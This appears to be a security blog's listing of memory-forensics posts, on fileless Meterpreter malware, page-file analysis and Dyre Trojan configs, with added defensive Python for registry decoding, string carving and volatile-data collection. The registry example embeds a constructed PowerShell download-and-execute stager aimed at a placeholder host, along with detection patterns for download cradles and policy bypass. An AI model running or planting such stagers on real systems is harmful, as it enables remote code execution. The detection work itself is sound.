You are viewing 'memory analysis'

Fileless Malware

Memory Forensics Comes into the Light

David Biser

March 02, 2017 - Posted by David Biser to Threat Intelligence


Recently, fileless malware has shown up in numerous LinkedIn articles, blog posts and research papers. It’s being discussed as the “new” threat to watch out for. I agree that this is an important topic, but I do not agree that it is a new threat. Rather, it has been a threat long ignored and is now being rapidly exploited by attackers.

To put the threat in context: fileless malware lives only in memory, with no file written to disk. The attack that prompted those reports used Meterpreter code resident in the physical memory of a domain controller. Along with the presence of Meterpreter, analysts found PowerShell scripts stored in the Windows Registry. For those who are unaware, Meterpreter is the in-memory payload of the Metasploit Framework, a free exploitation toolkit used by both penetration testers and criminal hackers. Once the attackers have Meterpreter running, they use various scripts to install a malicious service on the targeted host. After... read more >
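Registry-resident PowerShell of the kind described above is usually stored as a `-EncodedCommand` argument (Base64 of the script as UTF-16LE) in a Run key or a service ImagePath. The following is an added example, not code from the post or from NTT Security: it parses a constructed `.reg`-style export, decodes any encoded command, and flags the markers that separate a download-and-execute stager from ordinary admin scripting. Every key, value name and payload below is made up for the example; the indicator labels are my own.

```python
import base64
import re
from typing import Dict, Iterator, List, Optional, Tuple

# PowerShell's -EncodedCommand argument is Base64 of the script as UTF-16LE, and
# the switch may be abbreviated to any unambiguous prefix (-e, -ec, -enc, ...).
ENC_SWITCH = re.compile(r"(?i)(?<![\w-])-e(?:c|n|nc|ncoded\w*)?\s+([A-Za-z0-9+/=]{16,})")

# Markers that, taken together, point at a stager rather than admin scripting.
INDICATORS: List[Tuple[str, object]] = [
    ("Invoke-Expression", re.compile(r"(?i)\bIEX\b|Invoke-Expression")),
    ("download cradle", re.compile(r"(?i)DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b")),
    ("nested Base64", re.compile(r"(?i)FromBase64String")),
    ("hidden window", re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("policy bypass", re.compile(r"(?i)-e(?:xecutionpolicy|p)\s+bypass")),
    ("no profile", re.compile(r"(?i)-nop(?:rofile)?\b")),
    ("registry-stored payload", re.compile(r"(?i)Get-ItemProperty|\bgp\s+HK(?:LM|CU)|HK(?:LM|CU):")),
]

# Constructed stager; encoded here so the sample's Base64 is guaranteed correct.
STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
STAGE_B64 = base64.b64encode(STAGE.encode("utf-16-le")).decode("ascii")

# Constructed .reg-style export: one benign autorun, one encoded stager in a Run
# key, and one service whose ImagePath executes a payload stored in the registry.
SAMPLE_REG = "\n".join([
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]",
    r'"OneDrive"="C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"',
    f'"Updater"="powershell.exe -NoP -W Hidden -Enc {STAGE_B64}"',
    r"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinUpd]",
    r'"ImagePath"="cmd.exe /c powershell -ep bypass -c \"IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String((gp HKLM:\\SOFTWARE\\Foo).Blob)))\""',
])

KEY_LINE = re.compile(r"^\[(.+)\]$")
VALUE_LINE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def unescape(s: str) -> str:
    # .reg exports escape backslash and double quote with a backslash.
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text: str) -> Iterator[Tuple[str, str, str]]:
    """Yield (key, value_name, value_data) for REG_SZ values in a .reg export."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_LINE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_LINE.match(line)
        if m and key:
            yield key, unescape(m.group(1)), unescape(m.group(2))


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode a -EncodedCommand blob; None if it is not Base64 or not UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass it
        return None


def analyse(text: str) -> List[Dict[str, object]]:
    """Report every PowerShell-launching value, with its decoded payload and indicators."""
    findings = []
    for key, name, value in parse_reg(text):
        if not re.search(r"(?i)\bpowershell(?:\.exe)?\b", value):
            continue
        decoded = None
        m = ENC_SWITCH.search(value)
        if m:
            decoded = decode_encoded_command(m.group(1))
        haystack = value + ("\n" + decoded if decoded else "")
        hits = [label for label, rx in INDICATORS if rx.search(haystack)]
        findings.append({"key": key, "name": name, "decoded": decoded, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_REG):
        print(f"{f['key']}\\{f['name']}: {', '.join(f['indicators'])}")
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

Run it against a real `reg export` of the Run, RunOnce and Services hives (or an autoruns CSV with the parser swapped) and triage the values that decode to a download cradle first; the decoded text is also what you will want to grep for in the memory image, since the same stager is what Meterpreter was launched from.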

Hibernation and Page File Analysis

Not All Is Lost When You Lose Your Memory

Jeremy Scott

May 26, 2016 - Posted by Jeremy Scott to Security Insight

Computer Forensics

Some time ago I wrote a blog post, Memory: It’s What’s for Dinner, about the importance of capturing volatile data and memory analysis. I also provided an introduction to memory analysis in Hunting Malware with Memory Analysis and More Memory Fun. What happens if you are not able to grab memory? Obviously, a full memory capture of the suspect system gives you the best chance of recovering volatile information from the system, but if you can’t get one, not all is lost.

Hibernation and page files contain data that can help put the pieces of the puzzle back together. The hibernation... read more >

Cybersecurity Incident Checklist: Top 5 Sources to Review During a Cyberattack

Go Blue Team, Go Blue Team, Go!

Donovan Farrow

August 20, 2015 - Posted by Donovan Farrow to Security Insight

Blue Team

Reading through the latest cybersecurity industry threads, I find that much of the written information focuses on “How to Hack with (insert cool name here)”. This is great information for understanding how to perform different hacking techniques or for someone who wants to sharpen their hacking skills. For those who want to learn how a breach got started, what the common lateral movements are and what the ultimate goal of the event was, you need to dig a little deeper.

Many of these articles are missing a very useful segment of the information security family — the Blue Team. If you are not familiar with the term “Blue Team” let me elaborate. The Blue Team is the incident response team. During a cybersecurity incident, the Blue Team is the group that finds the “evil” in your network environment. By evil, I am referring to the attacker and the tools the attacker used to compromise the... read more >

More Memory Fun

Using memory analysis to pull Dyre Trojan config

Jeremy Scott

July 09, 2015 - Posted by Jeremy Scott to Security Insight

A couple of years ago, I published a blog post on Hunting Malware with Memory Analysis. Well, it is past time to dive back into some memory analysis fun. This time, however, we will use memory analysis techniques to retrieve the Dyre Trojan configuration.

Dyre is a well-known banking Trojan that harvests credentials, primarily targeting online banking. It does this with man-in-the-browser functionality and dynamic web injects that manipulate content on a financial institution's website and intercept the victim's credentials and other sensitive information. This is where the configuration file comes in. The configuration file contains the proxy server(s) controlled by the attackers and the target bank URLs that trigger the man-in-the-browser code to redirect the connection to the designated proxy server. Dyre’s configuration file looks like the following:

... read more >
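Whether the source is a page file, a converted hibernation file (hiberfil.sys is stored compressed, so convert it to a raw image before string hunting) or a full memory capture, the first pass at an attacker-controlled configuration like Dyre's is the same: carve printable strings in both ASCII and UTF-16LE and pull out the URLs and IP:port pairs. The following added example (mine, not code from either post, and not a parser for Dyre's actual format, which this page does not show) does exactly that over a constructed byte blob standing in for a pagefile fragment; every planted address is from documentation ranges.

```python
import mmap
import random
import re
from typing import Dict, List, Tuple

# Runs of at least 6 printable characters, as plain ASCII and as UTF-16LE
# (the encoding Windows uses for most in-memory strings).
ASCII_RUN = re.compile(rb"[\x20-\x7e]{6,}")
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){6,}")

URL_RX = re.compile(r"https?://[\w.-]+(?::\d{1,5})?(?:/[\w./?=&%-]*)?")
SOCKET_RX = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}:\d{1,5}\b")


def extract_strings(blob) -> List[Tuple[int, str, str]]:
    """Return (offset, encoding, text) for every printable run in the buffer."""
    hits = []
    for m in ASCII_RUN.finditer(blob):
        hits.append((m.start(), "ascii", bytes(m.group()).decode("ascii")))
    for m in UTF16_RUN.finditer(blob):
        hits.append((m.start(), "utf16le", bytes(m.group()).decode("utf-16-le")))
    return sorted(hits)


def hunt_iocs(blob) -> Dict[str, List[str]]:
    """Collect URLs and IP:port pairs from every carved string, deduplicated."""
    urls, sockets = set(), set()
    for _, _, text in extract_strings(blob):
        urls.update(URL_RX.findall(text))
        sockets.update(SOCKET_RX.findall(text))
    return {"urls": sorted(urls), "sockets": sorted(sockets)}


def hunt_file(path: str) -> Dict[str, List[str]]:
    # mmap so a multi-gigabyte pagefile or raw image is not read into RAM at once.
    with open(path, "rb") as fh, mmap.mmap(fh.fileno(), 0, access=mmap.ACCESS_READ) as mm:
        return hunt_iocs(mm)


def build_sample_dump() -> bytes:
    """Constructed stand-in for a pagefile fragment: seeded noise with planted strings."""
    rng = random.Random(2016)
    sep = b"\x00\xff"  # non-printable guard so planted strings never merge with noise

    def noise(n: int) -> bytes:
        return sep + bytes(rng.getrandbits(8) for _ in range(n)) + sep

    return b"".join([
        noise(512),
        b"https://online.bank.example/login.aspx",        # a "target bank" URL, ASCII
        noise(300),
        "198.51.100.23:4443".encode("utf-16-le"),          # an attacker proxy, wide string
        noise(256),
        b"GET /api/v1/cfg HTTP/1.1",                        # carved but not an IoC
        noise(128),
        "http://203.0.113.9:8080/gate".encode("utf-16-le"),  # a C2 URL, wide string
        noise(400),
    ])


if __name__ == "__main__":
    dump = build_sample_dump()
    for offset, enc, text in extract_strings(dump):
        if URL_RX.search(text) or SOCKET_RX.search(text):
            print(f"0x{offset:08x} {enc:8s} {text}")
    print(hunt_iocs(dump))
```

The UTF-16LE pass matters on Windows: a bank URL sitting in a wide string is invisible to a plain `strings`-style ASCII scan, and a proxy list that only shows up in one encoding tells you which code path wrote it.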

Memory: It’s What’s for Dinner

Jeremy Scott

May 09, 2013 - Posted by Jeremy Scott to

Memory is the new vogue and rightfully so. My Solutionary teammate, Susan Carter, recently posted a related blog. Coincidentally, we were both crafting our posts at about the same time, but I want to drive home the importance of capturing volatile data and performing memory analysis.

In the past, forensic examinations involving computer systems were always performed by immediately disconnecting any compromised or infected hosts from the network. This was done with a “hard shutdown”, or what has become known as “pulling the plug”, followed immediately by acquiring a forensic image of the hard drive. The rationale for doing this as the first step was to preserve the state of the hard disk.

Now, the first step in any incident response scenario should be capturing the volatile data at the onset. This has become critical to identifying the extent of the compromise or infection. In... read more >
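Capturing volatile data first means collecting in order of volatility and recording what was collected, when, and its hash, before anything on the host changes. The following is an added example, not code from the post: a small Linux triage collector (the Windows equivalents differ) that takes a full memory image as already done with a dedicated tool, then walks a plan from clock and network state down to mounts, noting gaps rather than skipping them silently, and writes a hashed manifest. The plan and output layout are my own; point the output at external media, never at the suspect disk, and run known-good binaries from a response kit, since the host's own `ps` or `ss` may have been replaced.

```python
import hashlib
import json
import os
import platform
import shutil
import subprocess
import tempfile
from datetime import datetime, timezone
from typing import Dict, List, Tuple

# Roughly most-volatile first. A full memory image is taken before any of this
# with a dedicated acquisition tool; it is deliberately not attempted here.
COLLECTION_PLAN: List[Tuple[str, List[str]]] = [
    ("01_clock", ["date", "-u"]),
    ("02_uptime", ["uptime"]),
    ("03_routes", ["ip", "route"]),
    ("04_arp_cache", ["ip", "neigh"]),
    ("05_sockets", ["ss", "-tunap"]),
    ("06_processes", ["ps", "-eo", "pid,ppid,user,lstart,args"]),
    ("07_sessions", ["who", "-a"]),
    ("08_kernel_modules", ["lsmod"]),
    ("09_mounts", ["mount"]),
]


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def run_step(name: str, argv: List[str], outdir: str) -> Dict[str, object]:
    """Run one collection command, save its output and hash it; record gaps explicitly."""
    entry: Dict[str, object] = {
        "name": name,
        "command": " ".join(argv),
        "started_utc": datetime.now(timezone.utc).isoformat(),
    }
    if shutil.which(argv[0]) is None:
        entry["status"] = "unavailable"  # a gap the report must show, not hide
        return entry
    try:
        proc = subprocess.run(argv, capture_output=True, timeout=30)
    except subprocess.TimeoutExpired:
        entry["status"] = "timeout"
        return entry
    except OSError as exc:
        entry.update(status="error", error=str(exc))
        return entry
    path = os.path.join(outdir, name + ".txt")
    with open(path, "wb") as fh:
        fh.write(proc.stdout)
        fh.write(proc.stderr)
    entry.update(status="ok", path=path, returncode=proc.returncode, sha256=sha256_file(path))
    return entry


def collect_volatile(outdir: str, plan=COLLECTION_PLAN) -> Dict[str, object]:
    """Execute the plan in order and write a manifest beside the captured outputs."""
    os.makedirs(outdir, exist_ok=True)
    manifest: Dict[str, object] = {
        "host": platform.node(),
        "collected_at_utc": datetime.now(timezone.utc).isoformat(),
        "outdir": outdir,
        "steps": [run_step(name, argv, outdir) for name, argv in plan],
    }
    with open(os.path.join(outdir, "manifest.json"), "w") as fh:
        json.dump(manifest, fh, indent=2)
    return manifest


def verify_manifest(manifest: Dict[str, object]) -> bool:
    """Re-hash every captured file; False if anything changed since collection."""
    return all(
        sha256_file(step["path"]) == step["sha256"]
        for step in manifest["steps"]
        if step["status"] == "ok"
    )


def collect_to_tempdir(prefix: str = "volatile_") -> Dict[str, object]:
    # Convenience for trying the collector; in a real response use external media.
    return collect_volatile(tempfile.mkdtemp(prefix=prefix))


if __name__ == "__main__":
    m = collect_to_tempdir()
    for step in m["steps"]:
        print(f"{step['name']:20s} {step['status']:12s} {step.get('sha256', '')}")
    print("manifest:", os.path.join(m["outdir"], "manifest.json"))
```

Only after this does the disk get imaged; the manifest's hashes are what let you later show that the captured process list or socket table is the one you took at the onset and not something edited afterward.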

NTT Security (US), Inc. (formerly Solutionary) is a security consulting and managed security services provider. The NTT Security blog is a place for IT professionals to both learn and talk about the latest in IT security and compliance.
